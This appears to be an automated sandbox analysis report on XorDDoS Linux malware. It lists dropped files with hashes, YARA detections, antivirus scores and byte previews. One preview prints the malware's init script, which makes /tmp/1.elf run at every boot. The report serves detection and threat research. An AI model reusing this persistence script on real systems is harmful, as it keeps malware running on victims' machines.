SSDEEP:	6:hUtoFdU9j0sKheJf24BE21YJvmNeMwhr2Q1DzRItAn6MzoAf4:6rf24BEMO1fzuynzdg
MD5:	DAF0CAF17D92CB9E3B8DA3DFC53C7147
SHA1:	8C55946DCEB3A1D3161BCDDB45EFEB9AD58C8D78
SHA-256:	CD3CB6574A33CA82144A2FE75CBFAEBC931B4CCC831D0FB1868F139C6D2B8B6F
SHA-512:	2CC61BAE5213FC9A8DDAF791D5A17A0AFE62EE9543CF7979F835ACF3264391F8C2D88E45455ACB2196B0476B1790060AF3C6E6617DEE8F375DCA5663BBCC09BE
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: 1.elf.### BEGIN INIT INFO.# Provides:..1.elf.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.1.elf.### END INIT INFO.case $1 in.start)../tmp/1.elf..;;.stop)..;;.*)../tmp/1.elf..;;.esac.

/memfd:snapd-env-generator (deleted)

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/gcc.pid

Process:	/tmp/1.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.202819531114783
Encrypted:	false
SSDEEP:	3:XfHUHTPewwddI:PYD7
MD5:	6E74B43719EA3696E5F9F5DF87EADB8C
SHA1:	0057A6800777921D82B60FCFFB6DCA412562C9FC
SHA-256:	4B9D182E84C62923EAA24BF04240C272A1F7EEF3356F09A2D2C0CCF506596252
SHA-512:	7934030975F1D0B72762A5B59DA6AE7593E109596681B296316090197F5ADEC0B91224091E3D9CFDC5DE236A88896E10B82359DF8DE1C788EA6F080E9663F8BE
Malicious:	false
Reputation:	low
Preview:	fgmoabirnicsesqjfpuivnebyqywfxxm

/usr/bin/bjhrrojebv

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244377063567257
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AV:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91s
MD5:	305F5484460FEB573C4A06D56E6AC96A
SHA1:	10A5F02B6798761E346BA82C5B9AA3434769122C
SHA-256:	89406B479B23068E9CF202E20AC39E622B60DCAC797E42C5E2313DE8AB34A52A
SHA-512:	9B35B6690B691E759D8B78409091DBF960580B387E2C14BBDB3548B7ED2EB2F22F3E0B27B97A7C7A6A1872938D604E1C05521FC656B8BAC1C0697A8DC85DE115
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/bjhrrojebv, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/bjhrrojebv, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/bjhrrojebv, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ccxfvtbhgr

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244376854378132
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AM:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91t
MD5:	6A5ECA188339A325E9AC1189DBB89376
SHA1:	08AF39951A3E2DA9DCCED1C0AA85B83BA265F410
SHA-256:	4E93904AF15363E5024EABC22B6EED848A9720A4922F772E6ABF1FA009241A73
SHA-512:	489E63471B7469684F76809BBFD222DB9DBA32DF4A23616780543A438725E7D4819E077EA60EF6584CBC952A7A644EB77044247704C8FDFBA25B51DBE135E214
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ccxfvtbhgr, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ccxfvtbhgr, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ccxfvtbhgr, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/cpbnjarskl

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244381746371613
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ai:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91n
MD5:	BDF7E50117E6BB11039B3F114D7DA203
SHA1:	3BD4C16719D3336C56F846696E9DA41B49D14F56
SHA-256:	C73DCC540E777840CCCB1E2053954355E4B8AE0EA77713D44634EFBB9F2B42D7
SHA-512:	46357B644ACDAF99E6EFC85DCB2A86014329F3BB0A0D048427495806275516777EA79AD07FF82A4EFF031368C8AC1A9A9BCF65C96883D0EAF02C834C9B84212B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/cpbnjarskl, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/cpbnjarskl, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/cpbnjarskl, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/dyuvutukki

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244375523768904
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AR:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/914
MD5:	0ACA8CF23A8C3E87B13A9C7043110017
SHA1:	A83054CDDB46F40BD6102D7A7D8885ED2B42D8BA
SHA-256:	161F8708CC5CDB80FD5C1B8781B41C2823200B1A34ADA38EDC378ACB39E5276B
SHA-512:	97D6582F64EA4446123A964FE9DEFB20F8356ACF91DF602851D85AF6DDFB2AFA7B655B913E2168FAFCFE844FAD8E396253396B21065E4633B2D828A3C3A170C7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/dyuvutukki, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/dyuvutukki, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/dyuvutukki, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/efgdvbpuxx

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244392832107416
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AV:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91A
MD5:	5ADF54DA233DDD71999A30AE5852D13E
SHA1:	8E6CE812F67B6E105AF07A0B50B79BDF19406569
SHA-256:	0258AD622C127C91F1FD910C554400613B9232005A39BE2ADA67942585A9B378
SHA-512:	23FFD6480D0D1CB37F998121A2A9DD47C9A8A8476BE3E2D6D8DB8E2E70AB822D48556599C7564DB729536114F8A3C02F290BDDE29D69EA623AA8DF6D8456B76E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/efgdvbpuxx, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/efgdvbpuxx, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/efgdvbpuxx, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ezztyrfjzf

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244382908273548
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ac:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91N
MD5:	9E1504DCB6964DBC17834520C7A967C0
SHA1:	0A58318C61E5612ABDBBDD3B56DE2754DC7B1C42
SHA-256:	F4CFD2974E92A788663911C3EB8C8002E7BEAF014729BFC724D10334A23ABD03
SHA-512:	191E35BC70ABC7775DF17A3328D976FB16BA39E1F501D88A8AE9E6E523C25EA430435A672FE34DB3BC66B0BC4FDE18A2D776D14F7967377A8FF2C4F09C6E99D9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ezztyrfjzf, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ezztyrfjzf, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ezztyrfjzf, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/lkzqkklpfr

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.24437710866733
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Aw:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91t
MD5:	26D5465CC1A2CAFF5BB4EE89004CBCAE
SHA1:	3B3BF9DA9B468198B5F762013FB66825274CC801
SHA-256:	44D447EC17097C1282C7E895996715B3339B815B602888234B2D75A8BF4E3221
SHA-512:	DAD177A717A093C22A8CE07F64D9BFF46C2574F788D1F3EC83DE503D743AC2BD67D1FDEF32776D96D33CC9B79018D116B9F3ADBDC805EFE5B9CC657245528CCB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/lkzqkklpfr, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/lkzqkklpfr, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/lkzqkklpfr, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/nxattrsdxm

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244378583917032
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ag:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91B
MD5:	25B1B59DAD8E150A80D50015EB75BD53
SHA1:	D295FD7681F6E8F3CF4F033618D176A185CBE2E1
SHA-256:	FC4203674C4F5D3F452E0E068BD8A82EC46B8785B3B6F178C7C938C5AEC49CD3
SHA-512:	3B076C782C3D339B33DBC37152D9B2D3A132AE74213FA69C9E43ED6CAC6972AEA6F9646193B1D0B4F2199BF3BDADB45B7C3B2DFE99DEAF36CE88B532393A5B2E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/nxattrsdxm, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/nxattrsdxm, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/nxattrsdxm, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ssrfvzfvpk

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	610304
Entropy (8bit):	6.209325538526162
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4Ul3:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl3
MD5:	6EF5B9F02482069ECB741DAA33391B1D
SHA1:	683579C49F64644F3BBEC227241CF09BCAE5272C
SHA-256:	4522DDC164593274A987ACC57EFF3734CC958FC6D79FED6A432C335844ACB510
SHA-512:	8A87E82CA3C48488664511D1156A12EBADDD341AA5ABBD0C37E360B4B375DE0D86370A4508BE2DFE5C285BD132F93EF3EC7BA65CBB91996A663B05DC56DFE366
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ssrfvzfvpk, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ssrfvzfvpk, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/uaewjndswe

Process:	/tmp/1.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244377453041466
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1A+:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91z
MD5:	042D91770189023B9E7A41C9DB18E788
SHA1:	5C2AE78E01C690702C5745C26F64B042C18E5FB7
SHA-256:	14E93A192447A182A76282D129D6DCEABC1DA6ABC5985D5DD58C286272CF67B9
SHA-512:	F7E8A2EF8F9D94AAABE8FF26559753E369C57FB7FBAFA6E8F190A737F2D791B1FF23ECAC29FE065346A8DE0300F17BF6BE9A788810639C2C4D9C0B9F85EB40A8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uaewjndswe, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/uaewjndswe, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uaewjndswe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
